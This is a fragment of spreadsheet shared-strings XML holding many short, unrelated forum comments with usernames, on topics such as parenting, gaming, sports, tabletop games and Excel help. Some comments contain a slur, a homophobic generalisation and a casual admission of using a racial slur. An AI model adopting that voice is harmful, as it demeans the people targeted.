    <t>Okay I’m going to watch it. you are actually scaring me tho lol</t>
  </si>
  <si>
    <t>Spokanstan</t>
  </si>
  <si>
    <t>&gt; How is it stealing from the workers if the workers are paid for their labor? Because Wage Slavery. &gt;We do not have slavery here The United States has the highest amount of Slaves in the world. &gt;Neither slavery nor involuntary servitude, *except as a punishment for crime* whereof the party shall have been duly convicted, shall exist within the United States</t>
  </si>
  <si>
    <t>Incredulouslaughter</t>
  </si>
  <si>
    <t>Thank you Scotland, you guys are awesome</t>
  </si>
  <si>
    <t>thesunnyjsun</t>
  </si>
  <si>
    <t>Short story, about scientists peering into a new dimension, where they see a normal nice looking family. They start throwing things into the dimension like an ice cube that melts, and eventually one scientist jumps in, only to be devoured by the family who turn out to be demons.</t>
  </si>
  <si>
    <t>ISOLordByron</t>
  </si>
  <si>
    <t>ZJee said: ↑ Can't believe I've missed this until now! I'lll most definately be there along with my Kenwood KH-71, and a homemade TH-900 if it's done by then. I'll be at the afterparty again as well. Can't wait to see all the guys from last year again! Last year's event was absolutely fantastic, very excited for this one! Glad to see you’ll be coming again too! I’ve got a silly thing I rigged up in a DT-990 chassis with KH-71 drivers I was hoping to be able to show you.</t>
  </si>
  <si>
    <t>Tears_of_skeletons</t>
  </si>
  <si>
    <t>Man I am totally torn on this one. While yes I agree with the general "it should have been separated", it is, in the end, only a plant. I understand how a different substance or allergy could cause an immediate angry negative reaction, I don't (personally) think exploding in front of everyone was the right way to go for something that in all likelihood, just made him sleepy/relaxed. Your son is 12, not 4 or 5 which would also maybe make it more nta vs yta. So maybe ESH would be my guess. Hope your son is okay though.</t>
  </si>
  <si>
    <t>ShaharyarAfzal</t>
  </si>
  <si>
    <t>Lol I thought they flashed another character at the ending</t>
  </si>
  <si>
    <t>neadzour</t>
  </si>
  <si>
    <t>Rly? Why don’t tbag some toxic player that insults you all the game?</t>
  </si>
  <si>
    <t>PatrickGSR94</t>
  </si>
  <si>
    <t>Look around the edge of the wheel, or perhaps on the back side of the wheel. The wheel size and offset should be stamped in there somewhere.</t>
  </si>
  <si>
    <t>SeamlessR</t>
  </si>
  <si>
    <t>Rehabilitation implies foresight. Punishment is instant gratification. Which sounds more human to you?</t>
  </si>
  <si>
    <t>&gt;&gt;477188273 &gt;&gt;The jump attacks are awkward, doesn't cause knock down on hit and has hit lag on contact. Light jump attacks don't knock down because you're supposed to use them to lead into a ground combo. Use heavy jump attacks for a knockdown or aerial special to take down a whole crowd.</t>
  </si>
  <si>
    <t>Clitoral_Pioneer</t>
  </si>
  <si>
    <t>Yeah, this is wild to me. We use OmegaFi and get payments from collections fairly often. They have something like an 80-90% collection rate on debt.</t>
  </si>
  <si>
    <t>&gt;&gt;72618049 Applefags get the wall</t>
  </si>
  <si>
    <t>robertgunt</t>
  </si>
  <si>
    <t>Wearing the silver everywhere else. I need all of those accessories.</t>
  </si>
  <si>
    <t>BostonBruinsGirl</t>
  </si>
  <si>
    <t>Plus I have seen these dogs in warmer climates. They do adapt but will always favor the cold and AC!!!</t>
  </si>
  <si>
    <t>&gt;&gt;21986053 Is it time to unsubscribe?</t>
  </si>
  <si>
    <t>i_am_a_visitor_here</t>
  </si>
  <si>
    <t>Oh it’s so good! I have it on DVD and make it a point to watch it like every year, haha</t>
  </si>
  <si>
    <t>CrankyStalfos</t>
  </si>
  <si>
    <t>Oh cool. Not quite what I was looking for, but certainly better. Thanks!</t>
  </si>
  <si>
    <t>runningman022003</t>
  </si>
  <si>
    <t>If it's not, it should be. Men can grow beards, but growing a beard doesn't make you a man.</t>
  </si>
  <si>
    <t>thelifestreamer</t>
  </si>
  <si>
    <t>I'm really looking forward to it, considering I have over four thousand...</t>
  </si>
  <si>
    <t>babysteps17</t>
  </si>
  <si>
    <t>I say start implementing a routine asap! We started one with our first daughter when she was about 5/6 weeks and she quickly became an awesome sleeper, and still is at 21 months. New baby is now 9 weeks and we are fully into the evening routine now. We bath both of them together at 6.30, baby bath inside the big bath, and older one LOVES helping to wash little one (!) Then dress and sort baby while toddler carries on splashing. If there are 2 of you then it's easy, take 1 child each for story, milk, bed in separate rooms, if you're on your own, much trickier! You have to hope that baby rocks/kicks/sits quietly while you do toddler's story! Daytime still isn't much of a routine, but a couple of times I've successfully got them to nap at the same time around lunchtime. Separate rooms and I use white noise for both, nice and loud so it drowns the other one out! I think if the big one is in a good routine and is happy to entertain themself it makes it infinitely easier. Good luck!</t>
  </si>
  <si>
    <t>ColumbusSC85</t>
  </si>
  <si>
    <t>While I’m not opposed to the different species, I find it difficult to immerse myself into one. I’m not a giant cat person so I can’t even begin to think like one lol. However, maybe therein lies the challenge.</t>
  </si>
  <si>
    <t>darkscapesucks</t>
  </si>
  <si>
    <t>&gt;I am pretty sure that most people that join the military are not joining just to kill people, that is a horrible thought. I never stated that was a thing. &gt;Having to kill people must be traumatizing They don't "have" to kill anyone. They did sign up for it so you knew there was a possibility that if you're in a combat position you'd be expected to kill or be killed. Killing someone **should** be traumatizing. You're ending another person's life. There is no excuse. It is the ultimate sin against humanity, and I'm not even talking about from a religious standpoint.</t>
  </si>
  <si>
    <t>sadchalupa</t>
  </si>
  <si>
    <t>Hello everyone, Looking for some good apps that are compatible with Chrome OS that helped you get by university. Looking more specifically for a good PDF reader/annotator; been using Lumin PDF and Doc Hub but I'm not satisfied with either. Free or not doesn't matter, I'm willing to pay for anything that will make my student life easier. All apps are welcome, however. Anything you guys have used in the past! Cheers!</t>
  </si>
  <si>
    <t>&gt;&gt;10964610 considering most people are here to discuss IQ, I think you are gravely mistaken.</t>
  </si>
  <si>
    <t>asianswagmaster</t>
  </si>
  <si>
    <t>A fair nerf would be to make the invincibility shield disappear when you start taking damage or start attacking.</t>
  </si>
  <si>
    <t>bbjenn</t>
  </si>
  <si>
    <t>I missed quite a bit of Cliff &amp; Nicole’s convo. Did they discuss having Holly throw the HOH tonight and then decide against it?</t>
  </si>
  <si>
    <t>deathondarkwings</t>
  </si>
  <si>
    <t>I’m afraid to have feelings other than exactly what is expected. I’m working on it, but anything like... crying in public (even if I’ve been serious injured) is a no go for me.</t>
  </si>
  <si>
    <t>CantHolMeBacc</t>
  </si>
  <si>
    <t>Good shluck</t>
  </si>
  <si>
    <t>mikebrown33</t>
  </si>
  <si>
    <t>I’m making a reference to a Monty Python sketch - but thanks for the thoughtful response.</t>
  </si>
  <si>
    <t>Jedi-Master-Kenobi</t>
  </si>
  <si>
    <t>Trade Cam in the offseason. Fire Ron. Start Grier. Tank for Trevor.</t>
  </si>
  <si>
    <t>Vandalizee</t>
  </si>
  <si>
    <t>dryer with tennisballs, works wonders for sure</t>
  </si>
  <si>
    <t>SlushyJayJay</t>
  </si>
  <si>
    <t>The most wholesome celebrity</t>
  </si>
  <si>
    <t>Phytanic</t>
  </si>
  <si>
    <t>Someone already posted a fix on a different thread. https://www.reddit.com/r/sysadmin/comments/cyo4ns/comment/eytbddi Tbh this is probably the first time ive saved a comment and actually used it like i always think i will.</t>
  </si>
  <si>
    <t>cricket73646</t>
  </si>
  <si>
    <t>NTA. He’s a grown up. He should be responsible for getting himself across the country. If you’re offering to help, he should be grateful.</t>
  </si>
  <si>
    <t>Eggsell</t>
  </si>
  <si>
    <t>So I have a sub that formats a sales report for me. I am looking to add 3 columns at the end of the sub because I can't figure out how to add it to the original sub. the coulmns need to perform calculations on whatever sales numbers come out but I am struggling to write that in VBA. Basically you have a spread sheet of numbers and the 3 columns I want to add at the end of the sub are like column J = (h4+f4)/c4 but I want to apply this formula to every cell in column j going down e.g. (h5+f5)/c5 but only if there is data in those columns How do I start this in vba?</t>
  </si>
  <si>
    <t>KillAllPaparazzi</t>
  </si>
  <si>
    <t>You need to find someone who is also ultra reserved and conservative when it comes to sex and not try to be so controlling in order to soothe your own untreated insecurities, instead of forcing someone who is otherwise a normally functioning sexually healthy adult to conform to your extremely specific and unrealistic standards. That being said, her mental health issues clearly extend way beyond you just being a bitch about sex toys because you think your penis is inadequate. You aren't professionally equipped to deal with it, and using suicide as a manipulation tool is extremely dangerous and abusive. You're terrible for each other. Do each other a favor and never speak again.</t>
  </si>
  <si>
    <t>Houseofwolvesmd</t>
  </si>
  <si>
    <t>You're not wrong, but remember that Auba is 31 now, i think it makes sense that he'll move on at some point, i honestly think selling either would be a huge mistake, mainly for the dressing room. They're involved in everything, and they seem to be top players at coaching youth as well, Laca took Martinelli under his wing, and i think it kind of shows! i think they're both great for the club We've seen Auba and laca work as well, when Auba goes central, Laca moves out wide where he's actually not too bad at holding up play and brining in fullback and with Auba out wide, it'll be interesting to see if Tierney makes a difference, a huge issue we've had is Monreal and Kola not releasing wingers on time, they instead seem to opt to put their foot on the ball, stop play and pass it centrally</t>
  </si>
  <si>
    <t>^^^^AUTOMOD ***The following is a copy of the above post. This comment is a record of the above post as it was originally written, in case the post is deleted or edited. Read [this](https://www.reddit.com/r/AmItheAsshole/wiki/faq#wiki_post_deletion) before [contacting the mod team](https://www.reddit.com/message/compose?to=%2Fr%2FAmItheAsshole)*** I don't know how long we argued/rationally discussed, but it felt like an hour. It was the last game of the day and our other friends went to sleep soon after, but we kept discussing among ourselves without coming to an agreement. I feel like this is petty, but I don't want to lie just to settle it. We aren't hurt over the ordeal, but we can't come to an agreement. For context we were playing a game called coup. It's a lie/cheat/steal kind of game with simple mechanics but complex implications. We play this game occasionally over the past 3 years. My best friend claims, at first, that I won the last game because I stole a play-style that he used earlier in the game. I refuted that I did not steal **his** play-style even though it looked the same and I had my own reasons for playing the way I did without referring to his own play-style. For one I inferred his intent was different when he did his moves (setting a trap) when I analyzed him earlier, but apparently they weren't (playing it safe). I reiterate that coup is a simple game, there are not many actions that could be done. One strategy is withholding information about your hand by not using your card abilities immediately and using them later to fool opponents. He did that strategy twice in a row in earlier rounds, and I did it in the last few rounds. This strategy is the safest, un-counterable, low risk low reward strategy in the game. I was also editing photos during the time so it looked like I was distracted and using low risk moves. Incidentally I had the same hand he did in the first round so he said I stole his strategy initially, then attempted to have me admit that I was inspired by his strategy. I said I would not lie because that is not what I did. He said it was apparent I stole it because in the court of law, the actions that transpired were identical (I can't remember if they were or not, just that we both withheld a vital card until late game with the same board texture) and I would lose a court case irrelevant of my intentions. This went back and forth for an hour. Eventually we agree that he used the strategy first tonight. We agree that we had the same reasoning to play the way we did, he agrees that I came up with my own intentions to play that way, but I didn't agree that I was inspired in any way by him to play the way I did, which is where we are at a standstill He stretches at the very least my subconscious made me play the way i did. **He agrees that he has no claim on the strategy, and we have all used the strategy in the past, but tonight I used that strategy because he did.** I said the only reason he wants me to admit to being inspired by him was because he is egotistical, that I had very valid reasons for playing the way I did without using him as a reference. AITA for being adamant and keeping the argument alive? *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AmItheAsshole) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Janube</t>
  </si>
  <si>
    <t>It categorically needs the chests reworked, since there are a few characters that can just pop them close to instantly and get out with all the coins immediately (Tracer/Genji/Lucio/Dva/tychus) while some mages have to sit there for 20 seconds to get the whole thing done. Those chests should've seen the same change that Murky's puffer got.</t>
  </si>
  <si>
    <t>freediverx01</t>
  </si>
  <si>
    <t>&gt; being fractions of inches in difference. "Fractions of inches" would be terrible. We're talking fractions of millimeters which would be hard to notice without a side by side comparison.</t>
  </si>
  <si>
    <t>goobersnatcher2000</t>
  </si>
  <si>
    <t>Also gay people's biggest enemy is probably either their own community or AIDS</t>
  </si>
  <si>
    <t>Warnavick</t>
  </si>
  <si>
    <t>I agree but the 5e play loop looks like: 1. The DM describes the environment. 2. Player states an action in response to the info 3. The DM determines if the player's action succeed, fail or uncertain (call a roll). Then you repeat the steps. Making a roll is certainly often done but it isn't a certainty (well, maybe for combat). Basically a DM can say you fail or succeed if they believe your action has a certain outcome. Such as picking a forgotten safe's lock in a safe environment or your character trying to convince an insane fanatic to change their ways.</t>
  </si>
  <si>
    <t>fuckmyusername01</t>
  </si>
  <si>
    <t>The first sentence is a play on words, in french a "super coup" is at the same time someone that fucks well, or means it means the fuck you had was really good. But "coup" directly translates to "hit" as well. "Si vous aimez les super coups" is playing on this, showing scantily clad women thus meaning what we think it means, and then turning it around by saying "Tekken 2 va vous éclater" which plainly means "Tekken 2 is going to beat you up" or "Tekken 2 is going to hit you hard".</t>
  </si>
  <si>
    <t>&gt;&gt;68411603 Well yeah. Piampetits was about that big.</t>
  </si>
  <si>
    <t>tipytopmain</t>
  </si>
  <si>
    <t>Pro tip for anyone looking to buy a phone in the second half of the year; just wait for black Friday. Even here in the UK the deals are really good.</t>
  </si>
  <si>
    <t>fractiousrhubarb</t>
  </si>
  <si>
    <t>Unfortunately, those of us who live in Australia are *very* familiar with how asinine Andrew Bolt can be. It’s his default state.</t>
  </si>
  <si>
    <t>mjgoldberg</t>
  </si>
  <si>
    <t>its laughter island, not want to stab myself island</t>
  </si>
  <si>
    <t>MadEorlanas</t>
  </si>
  <si>
    <t>Sure, a movie that made 1.3 billions and is as of now the 13th highest grossing movie of all time definitely fucked the franchise. Why is that again?</t>
  </si>
  <si>
    <t>swanggingdong6969</t>
  </si>
  <si>
    <t>First ones free</t>
  </si>
  <si>
    <t>Kjelldh</t>
  </si>
  <si>
    <t>So when i open the webapp i can’t go on the transfermarkt. The only thing i can do is SBC’s Can someone please help me bcs i don’t now what to do. PLEASE HELP ME</t>
  </si>
  <si>
    <t>Killz4Rune</t>
  </si>
  <si>
    <t>At least he has the will to learn</t>
  </si>
  <si>
    <t>Very short discussion posts are usually a sign of poor quality. Please try again with more in-depth text in your self post. You will need to include text longer than 50 characters to get past the bot. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/Music) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>AlexaPlayBot</t>
  </si>
  <si>
    <t>Now playing: [Luis Fonsi - Despacito ft. Daddy Yankee](https://youtube.com/watch?v=kJQP7kiw5Fk). ^^[ stop messaging me](https://reddit.com/message/compose/?to=AlexaPlayBot⊂ject=Blacklist+me&amp;message=!blacklist) | [programmer](https://reddit.com/message/compose/?to=bspammer) | [source](https://gist.github.com/bspammer/97f1dc8c676ca93af9289a77a0d4e93a) | [banlist](https://reddit.com/r/AlexaPlayBot/comments/92euyo/subs_the_bot_has_been_banned_from/)</t>
  </si>
  <si>
    <t>iTwitchALOT</t>
  </si>
  <si>
    <t>Whose side are you on? A few shitty racist cops doesn't automatically mean systemic racism. For every story you can find about a rich poc being a victim of racism, I can give 50 stories of a poor white person getting fucked in the ass by the government.</t>
  </si>
  <si>
    <t>Einarmo</t>
  </si>
  <si>
    <t>Well, adding a number to itself is the same as multiplying it by two, which is the same as shifting it once to the left.</t>
  </si>
  <si>
    <t>chuchofreeman</t>
  </si>
  <si>
    <t>Friendly reminder, if you do cocaine or other hard drugs, YOU are also part of the problem and help finance these guys.</t>
  </si>
  <si>
    <t>ApolloSavage</t>
  </si>
  <si>
    <t>Eh, I Reddit when I’m depressed. I didn’t mind.</t>
  </si>
  <si>
    <t>The_Best_Boy</t>
  </si>
  <si>
    <t>This is the cheapest way to get amiibo. I also think it’s hilarious how cheap these are considering a new animal crossing game is releasing soon and will likely give these figures relevance.</t>
  </si>
  <si>
    <t>viridusleo</t>
  </si>
  <si>
    <t>They’re going up [OC]</t>
  </si>
  <si>
    <t>PantherEverSoPink</t>
  </si>
  <si>
    <t>&gt; Jackson claims while she was in the coma, her &gt; husband was assured the producers would pay for her &gt; medical care and rehabilitation, but they've since &gt; withdrawn the offer. Ergh, what scumbags. How do they sleep at night?</t>
  </si>
  <si>
    <t>AaronJ003</t>
  </si>
  <si>
    <t>I'm horrible at catching signals so I just prefer the straight forward approach.</t>
  </si>
  <si>
    <t>trefto</t>
  </si>
  <si>
    <t>Vaibhav Joshi said: ↑ I don't understand how EQ vs preamps differ... Apart from the gain in the preamp, that helps you give that pushed sound (mid/treble..). Also, it would help if the tone stack is before the gain stage in a preamp.. Click to expand... Guess the clover does qualify as a preamp with an eq section since it is the tone controls act as "frequency-specific volume knobs" i'd only thought them to be tone controls.</t>
  </si>
  <si>
    <t>JackalTanHorn</t>
  </si>
  <si>
    <t>The only thing stopping me from imagining Yakety Sax during this was that it wasn’t a fast paced enough chase.</t>
  </si>
  <si>
    <t>Shalmon_</t>
  </si>
  <si>
    <t>it calculates m³/time for a given ore (I don't know for sure and I am German) For the next version OP: Implement EVE Auth and get the data from the current fitting :)</t>
  </si>
  <si>
    <t>Elchalupacabre</t>
  </si>
  <si>
    <t>Is that a white expo marker???</t>
  </si>
  <si>
    <t>&gt;&gt;12944471 I checked my url and I didn’t see /pol/ in there. Limp kn back or der</t>
  </si>
  <si>
    <t>hideuntiltheyfindme</t>
  </si>
  <si>
    <t>**Please DO NOT reply back to this removal message directly OR PM or invite moderators to chat. These messages will be ignored! See footer for more information.** --- Hi, *kelvinthegerman*! Unfortunately, [your comment](https://old.reddit.com/r/teenagers/comments/d08cqq/-/ezb7tg6/) has been removed from /r/teenagers for the following reason***(s)*** listed below: &gt;#2. No spamming. &gt;* **a. Advertising is limited. No more than one advertisement for any given community per day.** &gt; * **b. Advertising products, music, etc. is allowed, but users must follow [Reddit's 10% guideline](https://www.reddit.com/wiki/faq#wiki_what_constitutes_spam.3F).** &gt; * **c. Off-topic comments, jokes, and other unserious comments in serious threads are not allowed.** &gt; * **d. Links to GoFundMe, Kickstarter, etc. are not allowed.** *The full extended documentation of Rule 2 can be found on [this page](https://www.reddit.com/r/teenagers/wiki/rules#wiki_2._no_spamming.), as the quote block above is our simplified version for ease of reading.* This may have resulted in infraction points being added to your account. To see how many infraction points you have, [message the moderators](/message/compose?to=%2Fr%2Fteenagers). To learn more about infraction points, [click here](/r/teenagers/wiki/rules#wiki_point_system.3A). Please familiarise yourself with [our rules](/r/teenagers/wiki/rules) before commenting or submitting. --- **If you feel this was done in error, or would like further clarification, please don't hesitate to [Message the moderators](https://www.reddit.com/message/compose?to=%2Fr%2Fteenagers) or type /r/teenagers in the addressee box when composing a message to modmail us! Please DO NOT reply back to this removal message directly OR PM or invite moderators to chat. These messages will be ignored!**</t>
  </si>
  <si>
    <t>Partner</t>
  </si>
  <si>
    <t>I have been working full-time for more than 10 years Pros Working with amazing people who are diverse and inspiring thinkers, collaborate with clients to drive results in a way that truly is "different" and better Cons Like all consulting and intense jobs, a constant effort to balance work and life</t>
  </si>
  <si>
    <t>Jimmy_kong253</t>
  </si>
  <si>
    <t>Amen the carpool ads are getting annoying and take away from what waze is which is a directions app</t>
  </si>
  <si>
    <t>CajuNerd</t>
  </si>
  <si>
    <t>&gt; Last week, Ruby said he had asked school administrators if they could allow students to participate in the strike by hosting a field trip for the event. Earlier Thursday, they informed him they would not sponsor a field trip, Ruby said. Yeah, because your school is going to host and facilitate a protest by students...at the school board.</t>
  </si>
  <si>
    <t>TheFoxInTheShadows</t>
  </si>
  <si>
    <t>I do understand that it is mean to refer to the girl as lice girl, but the only other name I'd call her is extremely rude. She constantly tries to fight people, she is rude to everyone without reason. I do get that social status is very important in the school at the time, my "clique" is filled with "losers". I get lots of crap everyday, I do understand it. I have contracted lice multiple times during my time at school k-8, she should not be at school during this. Lice is extremely contagious. I do know what's going on at home for her, she lives a pretty normal life. They have enough money for casualties. I do know that her parents are neglecting their children, I get it. She is just.. Gross, for lack of a better word. I have tried to be friends with her, just to be turned down. I know how hard life is, especially when you're the "weird kid". Her mothers are spending their money on themselves, not their kids. That is a problem that she should ask help for, our principal is very nice. Her parents should not act like this but they don't hurt her, I do feel bad for them basically abandoning their kids but they buy them the things they need. She is honestly lucky for them not talking to their kids, I've met them, they're very rude and bossy. She acts all high up if you know what that means, the Queen bee. I don't care about popularity but not even the popular kids act like this, they do sometimes get in fights but they don't get in them every day. She is one if the few people that "play the victim" in my school, she acts like she has it SO bad at home. You may be wondering how I know this, her sister is a big storyteller. She tells me everything, including that she, in fact, also has lice. She tells me that her parents used to be spoiling their kids, a make up for being bad moms. I suppose she got used to getting everything she wanted, which is the parents fault. I feel that she should act more like the rest if the people in the school, the popular kids do interact with the unpopular. Most of them are even friends. She is in neither group, basically going to the delinquent group. Kids are harsh, let me tell you that. She runs her mouth about other kids and then gets mad when they get mad at her, which has happened multiple times. I honestly hope she gets better and gets a new attitude because she's going to end up getting FUBAR'ed.</t>
  </si>
  <si>
    <t>&gt;&gt;265200903 I was under the impression that its just a higher chance to drop, but it can still drop anywhere. I've done shattered throne so many God damn times and haven't gotten it anyway.</t>
  </si>
  <si>
    <t>YRJ</t>
  </si>
  <si>
    <t>YRJ , Sep 27, 2019 at 2:50 PM : Woah that's a lot of work!</t>
  </si>
  <si>
    <t>KRP_1545</t>
  </si>
  <si>
    <t>Is he reading the table language?</t>
  </si>
  <si>
    <t>ktmroach</t>
  </si>
  <si>
    <t>Mine was scared once it got dark, I wouldn't be far from home when it does.</t>
  </si>
  <si>
    <t>Hyper</t>
  </si>
  <si>
    <t>Quote: from: Jeff S. on September 27, 2019, 03:13:31 PM The 113, 115, &amp; 117 slots will be changed in programming. We know that additional FTA programming will be coming to this bird and other channels on the Central and South America feeds will populate more channels. So those channels on 116.8 will be populated on some of these satellite. New programming is supposed to come in. The issue is, they will be in 64 QPSK or S2X. Jeff Schumann Manhattan-Digital Thanks for the heads up!</t>
  </si>
  <si>
    <t>DeathByLineDrawing</t>
  </si>
  <si>
    <t>Thanks. Not being responsible for her feelings is one of the themes of the work I'm doing on myself. I'll get there.</t>
  </si>
  <si>
    <t>hazeliiis</t>
  </si>
  <si>
    <t>Thank you! I'm so biased with this dog. Lol.</t>
  </si>
  <si>
    <t>Cameron12151222</t>
  </si>
  <si>
    <t>That’s a motion sensor. Use to have the exact same one In my old house.</t>
  </si>
  <si>
    <t>King_of_idk_somethin</t>
  </si>
  <si>
    <t>This is something Lafleur addressed, but another problem is if we run on first down too often it goes for, at best, a 2 yard gain and usually worse than that. We need to consistently get 4-5 yards a run to stay ahead of the chains. That's honestly the only thing our defense struggled with yesterday too, they were running the ball at 4-5 yards a pop and we didn't get any good runs until the fourth(other than Jones's TDs). We became one dimensional and we didn't force them to become one dimensional enough.</t>
  </si>
  <si>
    <t>ViridiMayai</t>
  </si>
  <si>
    <t>That is such a better name that it's sickening how bad the original is in comparison.</t>
  </si>
  <si>
    <t>Wazzue</t>
  </si>
  <si>
    <t>Child</t>
  </si>
  <si>
    <t>dangondark</t>
  </si>
  <si>
    <t>Well... my senior year is gonna suck</t>
  </si>
  <si>
    <t>funkyb</t>
  </si>
  <si>
    <t>So I should point out they're new to d&amp;d, but not role playing in general. I'm basically running a 1 week break for our Call of Cthulhu game.But, points well taken. I'll find a satisfying way to cut it short if need be.</t>
  </si>
  <si>
    <t>Eastern_Canuck</t>
  </si>
  <si>
    <t>If you set up on that carcass the predators will return (i would only do this with a firearm)</t>
  </si>
  <si>
    <t>rvs007</t>
  </si>
  <si>
    <t>wendyegg519 wrote: ↑ Sep 27th, 2019 3:50 pm From YYZ, which route do most airlines fly into narita airport Japan? I mean do they fly through Canada towards Vancouver or go over Alaska? Is it a lot cheaper to fly from Vancouver to Japan? If it's a direct flight, I think they fly northwest through Alaska. https://www.distance.to/Toronto/Tokyo</t>
  </si>
  <si>
    <t>SirPiggington</t>
  </si>
  <si>
    <t>I too find myself using the n word when I am frustrated at literally anything. Not racist though.</t>
  </si>
  <si>
    <t>&gt;&gt;12966860 Try writing this again without meme formatting I might reply to you seriously</t>
  </si>
  <si>
    <t>CIA_grade_LSD</t>
  </si>
  <si>
    <t>The only reason the oligarchs who have profited off of the death of the planet would support UN policies is if they know those policies are too moderate and toothless to impact them significantly.</t>
  </si>
  <si>
    <t>&gt;&gt;479006110 &gt;why do you think that they are the only company that doesn't race their games to the fire sale price of $20 6 months after release Probably has something to do with them having a complete monopoly on their own system. Other 3rd party devs have to compete with each other on other platforms for buyer money. Anyone who owns a Switch pretty much only buys Nintendo games because that's all there is</t>
  </si>
  <si>
    <t>HerkaDerk98</t>
  </si>
  <si>
    <t>Israel is the one with the most powerful lobby in the US. The money goes to Israel. Not Palestine. There is geographic overlap but they are not the same. Also, Israel is the only country the US funds that has nuclear arms. Why are we funding them again? (Oh yeah they have the most powerful lobby in the US).</t>
  </si>
  <si>
    <t>mabellon</t>
  </si>
  <si>
    <t>Do you find yourself using the SB2 in tablet mode at all now that you have the iPad? Does tablet mode/pen on the SB2 have value to you now or would a simple Surface Laptop be sufficient (assuming it had the same CPU/GPU)?</t>
  </si>
  <si>
    <t>sykurwyn</t>
  </si>
  <si>
    <t>Yes, on the lotto page itself there's a small bit of text below your petal count that says how long you have left.</t>
  </si>
  <si>
    <t>RaistlinMajere16</t>
  </si>
  <si>
    <t>This seems mathematically impossible. I'm a CPS teacher and am 25 years in, on the Master's Track and my w-2 says I made $86K last year. I assure you with 25 years experience I'm the exception, I have 4th most seniority in the building with 100 staff members. The turnover has become outrageous in recent years and I teach at one of the best neighborhood level schools. How in the world does she think the average teacher will get to $100K in 5 years if I'm not even close to that yet?</t>
  </si>
  <si>
    <t>Birth_juice</t>
  </si>
  <si>
    <t>I think separating accusations against regular people and famous/rich people would make sense given the difference in the potential outcomes of the case (monetary compensation etc).</t>
  </si>
  <si>
    <t>ShrillRain</t>
  </si>
  <si>
    <t>I had a breech Bub from 28/29 weeks until 35 where he finally turned the day before my ultrasound and appointment to explore options!! I had decided I was going to decline an ECV because 1, I have big babies, my belly is tight and didn’t know if it would be successful with a potentially 8 pound baby. 2, I dont want to risk my babies health so even though the chances were small the idea of putting Bub in distress worries me, 3, the other risks although probably a 1 in a million risk... the cord detaching, the cord being squashed didn’t sit well with me. So you should do your research and go with what you are most comfortable with.</t>
  </si>
  <si>
    <t>I did most of it in college</t>
  </si>
  <si>
    <t>the_itsb</t>
  </si>
  <si>
    <t>Idk why you're getting downvoted, I didn't have trouble with them either, and there's nothing wrong with confirming that the problem is on the reception end and not the content end. "How dare you imply someone has a less than ideal bandwidth situation! Have at you!"</t>
  </si>
  <si>
    <t>josephhansen</t>
  </si>
  <si>
    <t>I told you I could help I have a talent for hunting down obscure things and making weird connections, I guess… I once wanted to be a strategic specialist for the FBI before I realized they don’t make any money. I still like that kind of thing though (and I am a Strategic Communication student, so it fits ) Either way, happy to help! Feel free to let me know if I can find anything else!</t>
  </si>
  <si>
    <t>dkwhatimdoingwmylife</t>
  </si>
  <si>
    <t>I like to consider i have a life i enjoy that i spend almost entirely outside of my phone (really just use my phone before bed or when i’m stopped in traffic on the way to work or my internship). I’m at home instead of school this semester because of my internship which is 16 hours a week in the office with remote work at home for the rest of the week. I also work 36 hours/week since I was able to continue on at my summer job which was bussing tables. with the rest of the time in my week, I do my work for my online classes, I work out, and I hang out with my really good friend sam since he’s my only friend I really have at home since everyone is away at their respective colleges. it was just nice to be able to talk to her after a long week of work and being in the office to wind down and it’s just a temporary change I gotta get used to. i spent all of summer focusing on myself. I lost 35 pounds, made a ton of money to invest/save to pay my loans back later, got my own car so I don’t have to depend on my parents as much/show responsibility, got As in all of my summer online classes, and am just a lot more efficient as a whole. i just need to get past this little change so I don’t end plateauing my recent personal growth curve if that makes sense. I really appreciate your response</t>
  </si>
  <si>
    <t>Koning52</t>
  </si>
  <si>
    <t>Are you running Mace Windu as a portrait? he might just be scared to turn his back on you.</t>
  </si>
  <si>
    <t>premedditbot</t>
  </si>
  <si>
    <t>Your post has been automatically removed because you did not include one of the required title tags or a flair. Please resubmit your post with a flair or a tag included in the title. A list of tags is also available in the sidebar rules (#7) **[Secondaries]**, **[Interviews]**, **[App Review]**, **[LORs]**, **[AACOMAS]**, **[AMCAS]**, **[TMDSAS]**, **[Canadian]**, **[CASPer]**, **[Extracurriculars]**, **[ECs]**, **[Happy]**, **[Meme/Shitpost]**, **[Meme]**, **[Shitpost]**, **[Discussion]**</t>
  </si>
  <si>
    <t>_Mr_Jay_</t>
  </si>
  <si>
    <t>That plant was in Queen's too, lol. Was it you who caused it to grow, lol.</t>
  </si>
  <si>
    <t>opus-thirteen</t>
  </si>
  <si>
    <t>If you can't finish a basic degree, what makes you qualified to start a school? You, quite literally, have never seen the process through.</t>
  </si>
  <si>
    <t>slow_marathon</t>
  </si>
  <si>
    <t>I would love to taste them again to see if my tastebuds had changed over the years. They were good but my two favourites were the findus boil in the bag: beef and gravy and the vesta chop suey with crispy noodles.</t>
  </si>
  <si>
    <t>zaner69</t>
  </si>
  <si>
    <t>Me too! Southern California having the same issue.</t>
  </si>
  <si>
    <t>Grubbanax</t>
  </si>
  <si>
    <t>EXCLUSIVE: On Election Eve, PM’s Office Gave $15m To Rich Party Donor From Money Set Aside To Tackle Black Poverty</t>
  </si>
  <si>
    <t>Slightly_Offensiv</t>
  </si>
  <si>
    <t>Love the view of the Flatirons.</t>
  </si>
  <si>
    <t>stars_and_infinity</t>
  </si>
  <si>
    <t>On the side of a highway with nothing around for miles. Put up a sign and say it's a roadside attraction.</t>
  </si>
  <si>
    <t>lab52</t>
  </si>
  <si>
    <t>Alright maybe i'll give it a go. You know what I don't understand though (since I have you here lol) - keto is heavy on cheese but then other anti-inflammatory diets say not to have cheese/dairy. lol I don't know, I've always been skeptical of those diets because they seem to contradict each other some times.</t>
  </si>
  <si>
    <t>Pure_Silver</t>
  </si>
  <si>
    <t>The cheapest place for LCT AKs I know of in Europe is FireSupport, in the UK. I believe that GunFire and TaiwanGun (both in Poland) might stock LCT too. The price difference between importing yourself from Asia and buying from a decently cheap shop in Europe has narrowed significantly in recent years, as the cost of shipping for HK/Taiwan has increased steeply and prices within Europe have dropped at some retailers. If you choose to import from Asia, WGC Shop, KIC, RedWolf, eHobbyAsia, Boom Arms, Bunny Workshop, AirsoftGlobal, and Tiger111HK are all large and reputable retailers.</t>
  </si>
  <si>
    <t>TripleExit</t>
  </si>
  <si>
